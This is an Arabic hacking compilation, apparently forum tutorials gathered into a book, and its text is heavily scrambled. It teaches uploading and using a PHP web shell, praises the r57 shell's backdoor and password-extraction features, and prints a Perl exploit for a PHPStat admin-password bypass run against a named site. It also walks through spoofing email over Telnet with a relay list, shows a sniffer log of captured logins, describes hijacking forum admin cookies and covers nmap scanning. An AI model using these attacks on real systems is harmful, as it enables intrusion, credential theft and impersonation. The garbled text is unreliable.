منه ھوة نفسه يعني فرضـا الموقـع php.shellنحنا نتحكم با : أرد علیك و أقولك اللي بدنا نخترقه كان

com.isreal://http / و رحنا نحنا حملنا الشل على الموقع نفسه فحیكون ھیك

483

php.shell/com.isreal://http الحظو انه ممكن يكون php.shell اله اسـم تـاني تختاره انت

ان الشل نروح نكتب اللي كتبناه فوق الموقع و بعده مك userحیطلعلنـا اذا كنـا حـاطین علـى الـشل باسـورد و يـوزر الزم نكتـبھم مـثال

narEy-aL: name fuckisreal: Password

و بعدھا نقدر ندخل على الشیل بس تدخل

رح يطلعلك مستطیل اسمه Commands

ھون نحط األوامر اللي بنا نفذھا و رح أرفق األوامر في نھاية الدرس ته تماما مربع كبیر ھون رح يطلع مثال حطینا أمر عرض الدرايفرات بـالموقع أما تح

رح يعرضھم ھناك بالمربع يعني اله استخداماته

اما باقي ما بقى فحاول تكتشفه بنفسك

: ثالثا

shellبعض أوامر اللي رح أعرب فايدتھا قريبا انشاء اهللا بس انتو فرجوني دعمكم

and a quick descriptionA list of commands

This allows the user view the current aliases........ Alias this allows the user to search for a pattern within a file........ awk

compares two large files......... bdiff scans a large file.......... bfs

endarshows a cal......... cal concatenates and prints a file......... cat

c compiler......... cc changes directories........ cd

changes a file groups ownership......... chgrb changes the permission on a file....... chmod

filechanges the individual ownership of a.......... chown compairs two files......... cmp

484

compares two files so as to determine which lines are .......... comm common to both

copies file to another location.......... cp calls another unix sysytem......... cu returns the date and time.......... date

shows all mounted drives on your machine........ .df displays the diference between two files......... diff

shows the disk usage in blocks for a directory......... du echoes the data to the screen or file........ echo

text editor........ ed lists the current environment variables......... env

another text editor........ ex evaluates a mathmatical formula........ expr

finds a file........ find fortran complier.......... 77 f

initializes a floppy disk........ format within a filesearches for a pattern......... grep

gives help......... help stops a running process........ kill

creates a link between two files........ ln copies the file to the line printer......... lpr

lists the files in a directory......... ls receive mail/allows the user to send........ mail

makes directory.......... mkdir displays a data file to the screen......... more

used to move or rename files........... mv allows a command to continue running even when you ........ nohup

log out used to format text......... nroff

changes your password ........ passwd installs a new program onto your machine......... pkgadd

Lists the current processes running........... ps displays the name of the working directory........ pwd

removes files........ rm

485

sremoves directorie........ rmdir lists all the variables in the current shell......... set

sets the environment variables......... setenv causes a process to become inactive......... sleep

allows the user to execute a file and update any ......... source changed values in that file

sorts files.......... ort s checks for spelling errors in a file......... spell

divides a file........ split sets the terminal options......... stty displays the end of a file......... tail

copies all specified files into one......... tar date stamp on a /creates an empty file or updates the time. .......touch

file outputs formatted output......... troff

sets the terminal type........ tset specify a new creation mask......... umask

compairs two files......... uniq unix to unix execute........ uucp

full screen editor........ vi opens the vi editor as well as password file for editing......... vipw

checks to see if there is a floppy disk mounted to your ......... volcheck machine

displays detail in the full size......... wc er people onlineon oth. inf........ who

send a message to another user......... write ....... !repeats commands

Not all commands are (More commands with a better description listed.(

nonblank-number--, b-: cat 1starting with , Number all nonblank output lines .

486

-e vE-nt to Equivale . -number--, n 1starting with , Number all output lines . -blank-squeeze--, s

Replace multiple adjacent blank lines with a single blank line . -t

vT-Equivalent to . -u

. for Unix compatibility; dالتجاھل -nonprinting-show--, v

notation `^' rol characters except for LFD and TAB using Display contand precede

M`characters that have the high bit set with -' . -all-show--, A

vET-Equivalent to . -ends-show--, E

after the end of each line`$' Display a . -tabs-show--, T I`^as Display TAB characters ' . --help

Print a usage message and exit with a status code indicating success . --version

Print version information on standard output then exit. أنصحكم بانكم تشوفو األومر بانكم تختارو من الیسار للیمین بیكون أحسن

487

و ھنا أضع آخر نقطة مھمة بعض المواقع ال

tk.ardra.www://http / موقع دراكوال العربي و اللي ھوة لیة و للفتاك org.arab4hack.www://http/ لألخ hunter-b مكتبـة و ال أروع شـاملة و كاملـة

ما شاء اهللاcom.bahory.www://http/ أكاديمیة بحر العیوني االمنیة لألخ العزيز بحر العیون

كمان مكتبة ما ممكن تمل

488

تريد شالااا حقیقیاھل

1980Worse:للكاتب

انا مـالحظ ان اغلى االدوات على قلوب ربعنا الھاكرز ھي الشلز يلوم اللي يلومھم وماالومھم واهللا

نظري الموضوع عبـاره عن افضل بي اتش بي شل موجود بالساحه من وجھة

r 57من البي اتش بي شل المعروف1.1وھو ااالصدار !!!الكلمه بمعنىھذا الشل مجنوون

ساقوم بشرح السكربت بسم اهللا نبداا

وتنفیذھا مكان وضع اوامر يونكس

الباسووردات فاتاستخراج اھم الملفات على السیرفر بما فیھا مل

امر ابلود والشــــك انه من اھم االوامر

المحبب لدى الكثیرين wget االمر المعرووف

489

يحاللك بورت او تشغیل باك دورسم الليعمل بايند شل او كمى يسمى فتح

الفايروول لتخطي مشاكل :: connect -back ::فتح باك دور باتصال عكسي

الباكدورز ممكن تشغلھم بسي واال ببیرل:1مالحظهمااثق بالفريق الني مااعرفھم ويمكن يكون فیه سكربتات خبیثه انا:2مالحظه

!!لفحصاليبخل با بالكود اذا حد عنده خبره

490

تعلم كیفیة ترجمة الثغرات بلغة البیرل مع تطبیق عملي

الھاكر الصغیر:للكاتب

اول شيء الموضوع لم اقم بكتبتة في اي منتدي غیر منتدانا الكريم

وترجمتھا من لغة الثغرات استثنار كیفیة الیوم مھم جدا جدا جدا وھو موضعنا وتطبیقھا علي الموقع ومن ثم البیرل

ةاختراق

وھي برنامج البیرل اول شيء االداوات المستخدمة لترجمة ثغرات!! الحین نبدأ اكتف بیرل

وصلة تحمیلة activeperl برنامج

-ActivePerl/.85/Windows/ActivePerl/com.activestate.downloads://http

msi.86x-32MSWin-.808.2.85

بعد تنصیبة علي الجھاز نبدأ بتطبیق درسنا الحین

مواقع السیكیورتي الحديثة وھي ثغرة في الحین نشوف مثال الحد ثغرات PHPStat Setup مواقع

ثغرة رة وفھمھا وانا جايبالثغ ترجمة معايا في الدرس وكیفیة الحین ركزوا

سھلة مشان ما تتعقدو

ده بیكون في اول / perl /bin/usrمن التاالي البیرل بلغة الحین كیف نعرف انھا البیرل بلغة الثغرة معاناھا انھا

المبتدئین يعرفوا احنا شغالیین كیف مشان

ثغرة الحین نبدأ نذكر اھم االسس لترجمة اي

السي او بالبیرل او البايثون او غیرة بلغة الثغرة ازا كانتاول شيء النظر للغة

491

مع التركیز فیھا وتطبیقھا بدقة usage النظر للمتغیرات او ثانیا

الثغرة يالنبدأ كود

perl/bin/usr!/# ###########################################

####### ################### r g r o u n d H a c k i n g T e a m S e t U n d e-T r a p #

################################################## ###################

PHP Authentication Bypass . PHPStat Setup-EXPLOIT FOR # Vulnerability

# )v -Sirus( P r o g r a m m e r _ A l p h a : Exploit By # : Mail -E#com.Yahoo@Programmer_Alpha # !!s Pass in This Portal 'This Xpl Change Admin#

SoulBlack: Discovered by# #

1.5phpStat : Vulnerable Version # #

################################################## ###################

Com.AlphaST& ke 0Str, karchack _Oil, rtal 0p_mh> ==tz To 33Gr# # :Security Teams & So Iranian Hacking #

# NeT.GrayHatz& Emperor , IHS ,ev -Simorgh, Shabgard , Crouz #

################################################## ###################

492

;Socket::use IO )3< ARGV @(if {

print =========================================n\"

;"n\= ;"n\n\-- Exploit By Alpha Programmer --n \" print ;"n\n\Set UnderGrounD Hacking Team -Trap" print ;"n\n\>Password> <DIR> <t3rg4T<: Usage" print

print \==============="===========================;"n\n ;"n\n\:Examples"print

pl .phpStat" print /com.site.www://http;"n\12345/ phpstat / ;()exit } ;]0[ARGV$= host $my

> =PeerAddr , "tcp"> =Proto ( new >-INET::Socket::IO= remote $my ,host$ ;" )80"> =PeerPort }" host$ct to 3nn0t C0nn4C"die { ) remote$(unless ;"n\cted3nn0C"print

GET = "http $[ARGV$=password&admin=username&yes=check?php.setup]1[ARGV$;"n\1.0/HTTP] 2

Windows NT ; .06MSIE ; compatible(.0 4/Mozilla: Agent-User.= "http $;"n\)1.1.4322NET CLR .;.25 ;"n\n\n\n\host$: Host.= "http $

493

;"n\...ll Packet 3Sending H"[+]print ;http$remote $print ;)1(sleep ;"n\...Wait For Authentication Bypass "[+]print ;)100(sleep )>remote<$(while { }

gin 0And Lphp .setup]1[ARGV$host$Now Goto ! OK "[+]print ;"n\n\:Whith ;"n\admin: User"[+]print ;]"2[ARGV$: Pass"[+]print

#

ترجمتھا بلتكون كالتالي الحین

المتغیرات وھي في ھذا او usageانسخ الكود وضعة في مفكرة مع تغیر ال الجزء من الكود

;"n\n\>Password> <DIR> <t3rg4T<: Usage

print \============================"==============;"n\n ;"n\n\:Examples"print

pl .phpStat" print /com.site.www://http;"n\12345/ phpstat / ;()exit }

داخل المفكرة الحین غیر اسم الموقع باسم الموقع المصاب وضعو

تاليوبیكون التغیرات كا

494

pl .phpStat/com.breatheoneslast.www://http; "n\12345/ phpstat /

tatphps/com.breatheoneslast.www /وھذا الموقع اللي بنطبق علیة

داخل الكود والتعامل بحرص والحظ االلتزام لمسافات

داخل مجلد وضعة sherba وسمیة اي اسم مثال pl واحفظة بامتدادbin \Perl\:C

الحین روح للدوس واكتب التالي

اكتب التالي في الدوس البیرل الحین انت داخل مجلد

495

لووووووووووووووووووول الحین ظھرللك الباس والیوز للموقع بدون تشفیر

ثغرة ولھا عیبوبھا رة بسیطة وطبعا كلالحین ھذا مجرد مثال بسیط لثغ وممیزاتھا

مترجمة معانا في المتتدي البیرل بلغة الحديثة اللي الثغرات الحین ابي اشوف

اهللا انشاء

وانتظروا بقیة دروسي لتعلیم فنون الھكر

ينقل الموضوع يكتب التالي ملحوظة ھامة جدا اايبي // جمیع الحقوق محفوظة للھاكر الصغیر\\ // و منتدي عالم القراصنة & منتدي مافیا و\\

496

ارسال رسالة مزيفة بالتلنت نتعرف على التعامل مع التلنت -1 نرسل رساله مزيفه يعني نخدع الشخص اللي نبي نرسل له الرساله -2

فیظن الرساله فعال من الجھة المرسله

؟؟؟ قبل البدء سأعطیك المعلومات ھذي او اذكرك فیھم

السیرفر او الھوست ھو ) العالمیه مثال (خدمة نقل الملفات الي شركه

21:sa.net.anet.ftp

اال اذا كانت الشركة لھا اكثر من خادم mailتبدأ ) وغالبا(خدمة البريد

25:sa.net.anet.mail اللي يھمنا الحین الصادر ) 110 والبريد الوارد 25بورت البريد الصادر (

ھناك خدمات مثل االخبار والقوائم البريديه مالنا شغل بھا

مدري وشلون الھمزه تكتب (صراحه كنت ناوي اطرح الموضوع على جزؤين ) على واو او نبره

نسیتھا الني مواصل حین كتابة الموضوع

صحیح ھذا .... المھم اكثر الناس يقول انا بخترق السیرفر عن طريق التلنت

؟؟؟ الكالم اوال

497

انا اوقف عند ھذه النقطة العتبارات منھا ما ادري وش رد فعل المشرف على الكالم

ھذا واحد الشي الثاني ماودي اجازف في كثیر من المغالطات مثل اللي حصل

بموضوع بالھوتمیل

؟؟؟ ...نرجع لموضوع الرساله المزيفه احسن

2طبعا في طريقه == telnetاكتب فقط ====تشغیل === اذھب الى ابدأ بس

مثل نجدي المھم رايح تطلع لك نافذه اختر من قائمة ) السحه ھي التمره(

ضع عالمة صح عند كل الخیارات اللي ) تفضیالت (برافنسس === تیرمنل ماعندھا صح

واترك الباقي مثل ماھو علیه السبب في ذلك على شان تشوف اللي تكتبه

ي مارايح يظھر معك بعدھا اضغط على اوكي النك لو تكرتھا وكتبت ش

خیارت 3تطلع لك نافذه فیھا ) remot systim(اختر ) connect(االن من قائمة

1- host name 2- port 3- term type

) انت رايح تستنتج السبب (اكتب فیھا على الترتیب 1-sa.net.anet.mail او الشركه اللي انت مشترك فیھا على شان صادر البريد 25 - 2

498

خلھا زي ماھي علیه التغیرھا -3

اضغط على كونكت رايح يتصل بسیرفر العالمیه او الشركه اللي مشترك فیھا

وتالحظ بشريط العنوان حق نافذة البرنامج اسم الشركة دلیل على اتصاله بھا

مؤشر يغامز بعد ذلك تظھر على الشاشه ارقام وخرابیط دالله انك متصل وال ينتظر

وانت من شركه اخرى ) بما اني مشترك عن طريق العالمیه ( منك تكتب فیه

ممكن يطلب اسم مستخدم وكلمة مرور اكتب فیه على التوالي

anonymous

com.arabtimes@billgates

للبريد عن طريق ) خوادم(او اي كلمة تختارھا عموما انا رايح احط لك سیرفرات

نت التل

في النھاية

نرجع للموضوع التواخذوني على االسھاب متعودين على الشرح

) عنوان الشخص اللي يعتبر مرسل الرساله( بعد الخرابیط اكتب مايلي

com.hotmail@webmaster:mail from

الحظ المسافه اللي بین المیل وفروم البريد اي واحد تختاره مو شرط اللي انا كاتبه

اء اهللا تحطه بريد كوفي انان انا مالي شغل انش

499

بعدھا تطلع لك رسالة زي ذي >Sender Okay... > com.hotmail@webmaster

معناته انك ماشي صح واال ارجع اكتب السطر من جديد ... او قريب من الرقم

: بعدھا اكتب الشخص المستلم الرسالة واكتب

com.yahoo@eed7wa_any:rcpt to

طبعا اي شركه واذا كانت خطواتك صح رايح يطلع لك زي السطر التالي >Recipiant Okay... > com.yahoo@eed7wa_any

بعد ذلك اكتب

data

رايح يطلع لك السطر التالي

354 on a line by itself"." end with , Enter mail

اكتب ھنا الرساله التالیه او اي رساله تبیھا

من بیل قیتس

الى فالن بن عالن

نظرا لجھودك المتمیزه فقد قررت ان ازوجك ابنتي على شرط ان تمتنع عن التدخین -1

500

عدم الوقوف عند باب منزلكم لمعاكسة بنات الثانوي الن ھذا عیب -2 تزور اصدقاءك اللي مازرتھم من فتره وتصل ارحامك اللي النت مشغلتك -3

عنھم

عن المؤخر فھو اما

وحطبه 500سیرفر منزل علیه يونكس االصدار

===================================== ثم انتر "" النقطة بدون عالمتي تنصیص ". " وبعد ماتنتھي اكتب

اكتب بعدھا

quit

طبعا خويك بعد ماتصله الرساله رايح يطیر من الفرحه ويروح لبوه ويلبس البشت مطار اقرب رحله لمريكا رايحین يخطبون بنت بل قیتس ويزفھا بداتسون ولل

) ددسن ( غمارتین بدون ھنقلین

اما بالنسبه لخوادم البريد التي يمكن اسنخدامھا فھي

25:net.airmail.mail 25:com.geocities.mail 25:net.mnsi 25:com.hacker 25:ca.on.iaw.mail 25:com.sisna.pdx 25:my.jaring 25:kr.co.dacom.chollian

501

25:net.yours-all 25:com.plix 25:net.ids 25:au.edu.uq.student 25:ca.istar 25:net.total 25:net.tfs.mail 25:com.ecis 25:com.mindspring 25:edu.uc.popmail 25:com.atcon.mail 25:net.future 25:net.aloha 25:com.ovnet 25:net.reach.connect 25:net.internet-valley 25:com.valleynet 25:com.cfw.milo 25:com.august.scs 25:net.hiwaay 25:com.clandjop 25:us.mi.12k.diisd.unix 25:net.erie 25:net.voyager 25:com.awod 25:com.netforward 25:com.netcreations 25:au.com.wantree.mail 25:net.ns 25:net.microserve 25:net.wbs 25:org.hwg 25:org.eff 25:com.std.europe

502

25:com.misty 25:net.succeed 25:com.discovery.mail 25:com.cnet 25:com.nytimes 25:org.3w 25:com.audionet.mail 25:edu.mit

ھذول األشیاء بس طبعا مھام التل نت ما تنحصر علىيعني ... اي سیرفر.... ممكن يشبك على اي شيءclintالتل نت ھو عباره عن

لو عرفت األوامر و و و و و و FTPممكن تستخدمه كـ لوووو عرفت االوامر ..او تستبدله بدل الكالينت للسب سفن... حتى متصفح

503

Network Sniffing Fighter :للكاتب

Network Sniffing ل موضوعإنشاء اهللا سنتناو

من اھم االشیاء اللتي ينبغي الي مھاجم او Network Sniffing انا اعتقد ان يتقنھا الي مسؤول في اي نظام ان

? أساسا Network Sniffing طیب ، يعني ايه بالتالي" يتصنت"لكني سأسمیھا " يشم"معناھا sniff لكلمة الترجمة الحرفیة

Network Sniffing التصنت على الشبكة" عناھام" سواء تم (النظام ما ھي اال ادوات يتم تركیبھا على Network Sniffers ال

إمكانیة تتیح بتركیبھا) تركیبھا من قبل المھاجم ، او من قبل مسئول النظام ..النظام التصنت أو االطالع على كل االتصاالت اللتي تتم من وإلى

تكمن في انھا تستطیع الكشف عن الffers Network Sniالخطورة في ال

"passwords ألي مستخدم يستخدم خدمات كال" كلمات المرور etc .. Pop /IMAP/rlogin/ftp/telnet على النظام المركب علیه تلك

.."المتصنتات"

..يعني مثالولیكن عنوان ) خادم او ھوست(مھاجم ما نجح في اختراق سرفر بافتراض ان net.hacked.1- serverترقالنظام المخ

net.hacked.1- serverعلى" متصنت"ونجح ذلك المھاجم بتركیب server -بذلك سیستطیع المھاجم االطالع على ما يقوم المسؤول عن

net .hacked.1من انشطة ، فبالتالي لو قام ذلك المسئول باالتصال بسرفر آخر net .hacked.2-serverبتسجیل " المتصنتات"م عن طريق التلنت مثال ، ستقو

، user name ذلك المسؤول ،طبعا ھذه االنشطة ستحتوي على كافة انشطةserver -سیستخدمھا المھاجم الحقا للدخول على واللتي password ...وال

net .hacked.2 2آخر جديد على "متصنت"، ومن ثم سیركب - serverوھكذا ... واحیانا (السیطرة على عشرات فييعني خالل فترة قصیرة قد ينجح المھاجم

504

!! من االنظمة االخرى انطالقا من نظام واحد مخترق) مئات

و ھو كنت قد" تقرير المتصنتات sniffers log "لبعض التوضیح ساضع جزء من الحظ ايه المكتوب... ركبته على نظام مخترق

>------------------------ OK200 1.1/HTTP

GMT21:15:11 2003y Ma14 , Wed: Date 2.8.4/ssl_mod) Unix( Sun Cobalt 1.3.20/Apache: Server 0.1/external_pam_auth_ mod4.0.4/b PHP0.9.6/OpenSSL

1.25/perl_mod html.index: Location-Content

negotiate: Vary choice: TCN GMT09:56:37 2002 Jan 23, Wed: Modified-Last

"406487d3;5d88e4c3-39-bf398: "ETag bytes: Ranges-Accept

57: Length-Content close: Connection html/text: Type-Content

ftp /org.carebridge.www://http :

Connected to ./org.carebridge.www://http ) [ProFTPD(Server 1 rc.2.21ProFTPD 220 /org.carebridge.www://http ]

.ready (Name /tim:org.carebridge.www://httpneed , User denni okay331): .password

033andreana:Password :23telnet localhost ...127.0.0.1Trying .']'^Escape character is )Cartman (6.1Red Hat Linux release

mnadag:login686 on an i20-2.2.12Kernel 997cjc:Password

505

:208.38.29.81telnet ...8.29.81.3208Trying .208.38.29.81Connected to .']'^Escape character is

2003 May 16:18:3217 manager : Enter your user id

netprowler:user password :25telnet localhost ...127.0.0.1Trying .Connected to localhost .']'^Escape character is

----------------------------------------< ..عملیات اتصال من وإلى النظام الحظ انه تم القیام بعدة

لنظامین جديدين passwords في عملیتین منھم منھم استعطت الحصول على

على االقل واحد من االنظمة local root ومن ثم ساحاول ان اخذ صفة وھكذا... جديد sniffer لیكون بامكاني تركیب..الجديدة

rs sniffeللیونكس بین لنظام الیونكس ، لعل اكثرھم شھرة sniffersيوجد الكثیر من ال... الواقع

snort ..مسؤولي انظمة الیونكس ھو

صغیر وفعال sniffer والذين ھم بحاجة الى لكن بالنسبة لمھاجمین النظام ،متعدد االستخدامات root kit جید ، وخاصة انة SuckIT فاعتقد ان متلصص ك

sk/sd/sk.hysteria://http يمكن الحصول علیه من... من snifit وايضاhtml.sniffit/sniffit/coder~/be.ac.rug.reptile://http solaris/bsd/ linuxتعمل على انظمة مختلفة وھي

sniffers للويندوز

NetworkActivSniffer exe..41NetworkActivSnifferV/52/files/org.h-zone.www://http اداه صغیرة، ومجانیة وھي

506

صیلى للكوكى اديتورشرح تف

مش القى موضوع اشرحه قولت لما اجیب حاجه شبه قديمه واشرحھا تفصیلیا

: cookie editorالبرنامج اسم ) PASS,ID (تغییر الكوكیز:وظیفه البرنامج --------------- تمھید---------------

جه الى فكه الباسورد بتاع الكوكیز بدون الحا يقوم برنامج الكوكى اديتور بتغییر يعنى مشفر الى مشفرالصراحه برنامج حلو

--------------- الشرح--------------- حمل البرنامج من الوصله التالیه1-

zip .Cookie Editor/file/com.20kw.www://http وبعد التسطیب قم بفتحه فسوف يظھر لك صورته كالتالى سطب البرنامج2-

اوكى ھا الحین بتظھر المواقع المفتوحه واللى بتنزل فى جھازك كوكیز

)ذا قفلت الموقع حیتشال من القائمه اللى فى البرنامج(

507

بنريد تغییر الكوكیز بتاعه ونسجل دخول فتح المنتدى اللىن3-

ظھر بالصوره التالیه الموقع قدنقوم بعمل ريفريش للبرنامج حنالقى كما4-

الكوكیز بتاع عضويتك كما بالصوره

انتا الن والخاصه بالكوكیز بتاعك)) ى ع الصورهبین توقیع ((32 و 31فى الخانه

bblastvisit حتالقى واحده منھا مكتوب جنبھا ) bbuserpass,bbuserid (حاجه لینا ھوا اھم.ده مالناش دعوه بیھا

اوكى كلیك يمین بالماوس ونضغط على اديت32رقم)bbuserid(واحده نختار اول5-

زى ما موجود فى الصوره

508

حیظھر لنا المربع التالى

الخانه االولى سیبھا زى ماھیا اما التانیه فده بقى اللى عايزه تتعدل

509

ولو كان كوكیز 1 اكتب 1وھى االى دى وحسب بقى كوكیز االدمن لو كان رقم وھكذا بقى2اكتب 2االدمن

ییییییییییییییییییییییییییفثم اضغط سیی كلیك يمین بالماوس ونضغط على33رقم)bbpassword(واحده نختار ثانى6-

اديت حیظھر التالى

المشفر ثم الخانه االول سیبھا زى ماھیا اما التانیه فتكتب بیھا باسورد االدمن

اضغط ع سییییییییییییییییییییف تاكد من التالى7-

اوعى تضغط على ريفريش فى البرنامج بل تسیب كل حاجه زى ماھیا

ودلوقتى تعمل ريفريش للمنتدى فاذا ظھر كوكیز االدمن خیر وبركه وده8- غالبا xmbمنتديات بیحصل فى

المنتدى وان ولو مانفع اقفل صفحه المنتدى بدون تسجیل خروج ثم اعد دخول شاء اهللا يتغیر الكوكیز وتبقى االدمن

وانتا سايب الكوكى اديتور زى ماھوا من غیر كل الخطوات السابقه الزم تتم

510

ريفريش بالمنتدى نفسه ادخل فى لوحه تحكم المدير9-

ثم اكتب اسم ايمیلك واضغط على سیییییییییف المفقودحتى تستعید باسوردك forget my password اعمل10- الباس وخش على لوحه تحكم االدمن بعد ما تتبعت الرساله ع االيمیل خد11-

ومبررررررررررررررررررروك علیك يامان

(((ملحوظه اخیره)))اللى حتخترقه كذا بل مش شرط تكون االرقام بتاعت الموقع6 و 5فى الخطوه

للىده حسب الترتیب عندى وبتختلف عند كل واحد حسب المواقع ا شغاااااااااال علیھا

اسم bbpass(و)bbuserبتاع ولو عايز تتاكد من االسم حتالقى فى السطر الموقع اللى عايز تخش علیه

511

nmapشرح برنامج

Hunter- B:للكاتب

بسم اهللا الرحمن الرحیم-----------------------------------

Nmap- Network mapper شرح برنامج-----------------------------------

: Hunter-Bقام بكتابة الشرح-----------------------------------

الخاص به لعمل التجارب IP ألستخدامنا ال SaD jAckAl شكر خاص لـ-----------------------------------

: مراجع افادتني في كتابة الموضوع/com.google.www://http

nmap/org.cureinse.www://http numbers-port/assignments/org.iana.www://http

h-nmap Unix Security Portable Reference& Linux : HACK NOTES

----------------------------------- ---البدايه---

ه نريد ان نقولفي البداي ؟ Network mapper ما ھو برنامج

مفیده وامور اخرى UDP و TCP لبروتوكول Port Scanner ھو برنامج: الجواب

. جدا وسنذكرھا جمیعھا في ھذا الموضوع

من ھو كاتب ھذا البرنامج ؟

لیس روسیا واعتقد بانه روسي مع انه يقول بأنه Fyodor المبرمج ھو: الجواب كن شخصیا اظن انه روسي بعد ما شفته فيول(( Team 00 w00 w:-مع الـ Defcon الـ

ما ھي النظم التي يعمل علیھا ھذا البرنامج ؟

512

ان مع اني شخصیا لم استطع Windows وnix *يعمل في اغلب نظم: الجواب

استخدمه في ويندوز مع اني قمت بتركیب ما

winpcap يتطلبه من مكتبات

وم بتركیب البرنامج ؟كیف اق

: اذا كنت رووت: الجواب

wget # ]misc[/server @rootrpm.386i.1-.553-nmap/dist/nmap/org.insecure.download://http

--:21:2321--rpm.386i.1-.553-nmap/dist/nmap/org.insecure.download://http

'rpm.386i.1-3.55-nmap> `=

.done... org.insecure.Resolving download

.onnectedc... 80]:.210.250.3566[org.insecure.Connecting to download

OK200... awaiting response, HTTP request sent

]stream-octet/application [538,625: Length

00:00s ETA /K427.99 538,625] >[======================100%

]538625/538625[saved ' rpm.386i.1-3.55-nmap `-) s/ KB427.99 (21:23:23

rpm .386i.1-3.55-Uvh nmap- rpm #]misc[/server @root

]100%[########################################### ... Preparing

]100%[########################################### nmap :1

#]misc[/server @root

513

: من ھنا tgz فبأمكانك تنزيله rpm اذا كان نظامك ال يقبل: ملحوظه

tgz..553-nmap/dist/nmap/org.insecure.download://http والتركیب كما ھو معروف لديكم جمیعا

tgz.3.55-gunzip nmap tar.3.55-xf nmap-tar

3.55-cd nmap /.configure

make make install

ان افعل االن بعد ان قمت بتركیبه ؟ماذا بأمكاني

: االمثله االن سأقوم بشرح البارامیترز للبرنامج كلن على حده مع: الجواب

: sP ) 1وھي للقیام بعمل Ping sweeps لشبكة لجھاز ل range ما على

الشبكه لمعرفة االجھزه التي تعمل من التي ال تعمل

Ping ملحوظه يستخدم

: مثالroot@server [~]# nmap -sP 218.18.146.*

. appears to be up218.18.146.245Host





. to be upappears.252 .146.18218Host

seconds93.910scanned in ) hosts up6( IP addresses 256 --Nmap run completed

#]~[server @root

514

: PT ) 2وھي للقیام بعمل سكان بنظام TCP Ping الذي في حالة كان الجھاز Block ICMP يقوم بـ firewall علیه ذو scan تريد عمل

echo request الرد عبر ستقوم باالتصال مع المنافذ وسیأتیكفبھذه الطريقه

اذا تركت الخیار فارغا فسیقوم(( منفذ تحدده انت

Nmap اوتوماتیكیا80باختیار منفذ

: مثال

67.19.6.93 22PT-nmap # ]~[server @root

).55 3Starting nmap /nmap/org.insecure.www://tpht EDT22:17 13-07-2004at (

):67.19.6.93(com .theplanet.reverse.6-19-93.67Interesting ports on

)filtered: ports scanned but not shown below are in state1654The ( PORT STATE SERVICE

tcp open ftp/21

tcp open ssh/22

en smtptcp op/25

tcp open http/80

3tcp open pop/110

tcp closed xdsxdm/6558

seconds71.348scanned in ) host up1( IP address 1 --Nmap run completed

# ]~[server @root

515

تعتقد في المثال وبأمكانك اختیار اي منفذ22تم استخدام المنفذ : ملحوظه الذي امامك او اتركه فارغاانه مفتوح في السیرفر

80باختیار المنفذ االكثر شھره nmap لیقوم

: sT ) 3للقیام بعملیة scan TCP Connect بمحاولة االتصال حیث يقوم البرنامج

مع المنافذ فاذا تم االتصال اعطاك نتیجه واذا لم يتم

لم يعطك النتیجه

: مثال

93..6.1967sT -nmap # ]~[server @root

).55 3Starting nmap /nmap/org.insecure.www://http EDT22:24 13-07-2004at (

):67.19.6.93(com .theplanet.reverse.6-19-93.67Interesting ports on

)filtered: in stateports scanned but not shown below are 1653 The ( PORT STATE SERVICE

tcp open ftp/21

tcp open ssh/22

tcp open smtp/25

tcp open http/80

3tcp open pop/110

tcp closed auth/113



516

# ]~[erver s@root

: FTP Bounce Scan ) 4 افھم اقصد ما قدرت(( ماقدرت افھمه كثیر الى االن

ولكن اللي عرفته انك تقدر)) میكانیكیة العمل تبعه

عن عن طريق يوزر نیم وباسورد يوزر اف تي بي تعمل سكان باالي بي تبعه Nmap فيb - طريق البارامیترز

الخاص IPبالموقع المراد ال Firewallلاو ا IDS وبذلك سوف يظھر في ال فیه FTP Account بالموقع الذي تحمل ال

: مثال

67.19.6.93 21:com.yourftpaddress.ftp@pass:b user-nmap # ]~[server @root

).55 3Starting nmap /nmap/gor.insecure.www://http EDT22:48 13-07-2004at (

.skipping them, t allow privileged ports'Your ftp bounce server doesn

!t let us feed bogus ports'it won, Your ftp bounce server sucks

#]~[server @root

نیم بسبب انه السیرفر الذي املك الیوزر scan لم تتم عملیة: ملحوظه

والظاھر انه اغلب fakeوالباسورد له ال يسمح بعملیة بال

تنفع ولم ftp accounts السیرفرات لم تعد تسمح الني جربت اكثر من ستة معي ولكن انشاء اهللا سوف اقوم بشرحھا تفصیلیھا

يشرحھا بعد فھمي الكامل لمیكانیكیة عملھا واذا فیه احد من الشباب يقدر

: -(لتعاونيالیت واهللا من باب ا

517

sS ) 5وھو عمل سكان من نوعSYN / TCPالنوع وھذا النوع يعتبر اكثر خفاء من sT حیث انه ال يقوم بعمل اتصال كامل مع المنفذ في

يعطي رد ولكن الACK + SYNوانتظار الرد SYN الجھاز المقابل بل يقوم بارسال

علیه ولذلك يسمى ھذا SCAN للجھاز المراد عمل

Open- Halfبأسم scan الالنوع من

: مثال

67.19.6.93sS -nmap # ]~[server @root


):67.19.6.93(com .theplanet.reverse.6-19-.6793Interesting ports on


tcp open ftp/21

tcp open ssh/22

tcp open smtp/25

tcp open http/80

3tcp open pop/110


seconds72.432scanned in ) host up1 (IP address 1 --Nmap run completed

#]~[server @root

-g) 6 والفائده منه ھو انه اذا كان السیرفر يقوم بمنع اغلب الطرق التي ھذا البارامیتر يستخدم مقاله كتبت قبل سنتین ذكرناھا فان

518

محاضرات وقد شرحھا اخونا ساد جاكال على ثالثsk .box. neworder ))في والفكره ھوarab4 hack # ((ام اجتماعاتنا فيسابقا اي

20او DNS 53مثل IP ان نستخدم منفذ يثق فیه السیرفر والفايروول من أي

(( FTP Data Channel تثق فیه اغلب20منفذ

)) Activeحي FTP السیرفرات النھا تستخدمه في حالة كان ھناك اتصال مع)) )) mod ھنا يقوم برنامج nmap ل تزويربعم

مع انھا ال 20 او 53للباكیتات وارسالھا او تمريرھا اذا صحت التسمیه عبر منفذ

تتوجه الیه بل تتوجه الى المنفذ الحقیقي المراد

بھذه الطريقه عبر بامكانك تزوير الباكتات Scan وتتم عملیة ال-:معرفة وجوده ر شرح لھا في نفس المقاله المذكوويوجد hping برنامج

: مثال

67.19.6.93 53g -sS -nmap # ]~[server @root


):.93.6.1967(com .theplanet.reverse.6-19-.6793Interesting ports on


tcp open ftp/21

tcp open ssh/22

tcp open smtp/25

tcp open http/80

3tcp open pop/110


519

seconds71.929anned in sc) host up1 (IP address 1 --Nmap run completed

# ]~[server @root

sF ) 7وھو نوع اخر من الscan ويسمى FIN Scanning تقوم وفكرته ھي انك بارسال باكجات الى المنافذ في الجھاز المقابل فاذا

كان المنفذ اما اذا rest كان البورت مغلق سیقوم الجھاز المقابل بعمل انھاء

